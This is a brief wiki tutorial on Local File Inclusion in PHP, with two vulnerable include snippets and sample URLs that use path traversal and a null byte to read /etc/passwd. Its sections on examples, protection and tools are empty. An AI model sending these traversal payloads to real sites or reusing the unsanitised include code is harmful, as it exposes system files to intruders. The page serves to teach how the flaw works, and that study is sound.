Web applications attacks/Local file inclusion

From aldeid
Jump to navigation Jump to search

Description

Local File Inclusion attack consists of exploiting a non-protected script on the server to read the content of another file, that is not initially permitted by the application. The following example shows a vulnerable PHP script (index.php).

<?php
if(isset($_GET["page"])) {
  include($_GET["page"]);
}
...
?>

With such a script, it is possible to read the content of /etc/passwd file, by calling this way:

http://www.somevulnerablesite.com/index.php?page=../../../etc/passwd

Null byte inclusion

The Null byte inclusion (%00) enables to read files on a server, using a Local File Inclusion (LFI) attack. The following PHP example illustrates the attack:

<?php
if(isset($_GET["page"])) {
  require("/var/www/site/".$_GET["page"]);
}
...
?>

Such a vulnerable script could enable a hacker to access a non-expected file, by calling such an address:

http://www.somevulnerablesite/index.php?page=../../../etc/passwd%00

Refer to this site for further information: http://projects.webappsec.org/Null-Byte-Injection

Example

Protection

Tools

Comments

Talk:Web applications attacks/Local file inclusion